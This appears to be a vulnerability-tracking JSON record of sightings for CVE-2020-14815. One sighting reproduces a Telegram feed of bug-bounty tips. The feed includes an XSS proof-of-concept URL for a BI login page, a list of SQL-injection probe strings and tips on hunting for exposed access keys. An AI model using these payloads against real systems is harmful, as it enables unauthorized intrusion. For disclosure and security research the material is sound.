{"vulnerability": "CVE-2020-14815", "sightings": [{"uuid": "36abeacf-9e61-46c4-ac0f-74cd3b4a6da0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-14815", "type": "seen", "source": "MISP/af1fbe07-e10c-40c4-844e-d4419bdf6f80", "content": "", "creation_timestamp": "2025-08-22T13:26:18.000000Z"}, {"uuid": "e431e6ab-1a11-47b3-80d7-4c9cae026406", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-14815", "type": "seen", "source": "https://t.me/bhhub/6", "content": "#BugBountyTips of the Day\nMy bug bounty writeup - 31k$ from @GoogleVRP  - SSRF in Google Cloud Monitoring, which led to project metadata exposure.  https://t.co/dllReL05c1 #BugBounty #bugbountytips #bugbountytip  https://t.co/kNcMW43kZ2\n---\nI hit 1k rep today on @Hacker0x01 \ud83c\udf89 #BugBounty  https://t.co/Iax9ezd7IS\n---\nThe only Penetration testing resources you need:  https://t.co/UrkEh5sNsB  #bugbountytip #PenTest #Hacking #OSINT\n---\nNothing critical, but here is the PoC for the new CVE I got credited for: CVE-2020-14815.    https://target[.]com/bi-security-login/login.jsp?msi=false&amp;redirect=\"&gt;&lt;img/src/onerror%3dalert(document.domain)&gt;  Got a couple of Med in H1 using it. Have Fun!  #bugbounty #bugbountytips  https://t.co/A8qx640VgE\n---\n\u00bfNecesitas recibir un SMS en USA u otro pa\u00eds  y no tienes un numero de tel\u00e9fono de all\u00ed? este listado de servicios #gratuitos te van a servir, para que puedas obtener el mensaje de validaci\u00f3n   https://t.co/bsmUz6Vcwf -  https://t.co/6RGJgzPc9q #hacking #bugbountytips  https://t.co/EotJtEmubJ\n---\nI just published a write-up on \"Evading Filters to perform the Arbitrary URL Redirection Attack\"  https://t.co/liKCL8n7Dt   #bugbounty #bugbountytip #appsec #infosec #websecurity\n---\nSpider the entire application and search for sensitive parameters like \"API\",\"AccessKey\", \"CustomToken\". Sometimes you might get juicy information.  Recently rewarded by @GoogleVRP $3133.7 for the same technique that lead to app takeover.  #bugbountytips #bugbountytip #BugBounty\n---\nBug Bounty Tips This is how to find sql-Injection 100% of the time /?q=1 /?q=1' /?q=1\" /?q=[1] /?q[]=1 /?q=1` /?q=1\\ /?q=1/*'*/ /?q=1/*!1111'*/ /?q=1'||'asd'||'   &lt;== concat string /?q=1' or '1'='1 /?q=1 or 1=1 /?q='or''=' #bugbounty #BugBountyTips #SQLinjection\n---\nLatest web hacking tools:  https://t.co/JR4WPvTmG6  #bugbountytip #Pentesting #Hacking", "creation_timestamp": "2020-11-13T13:37:04.000000Z"}]}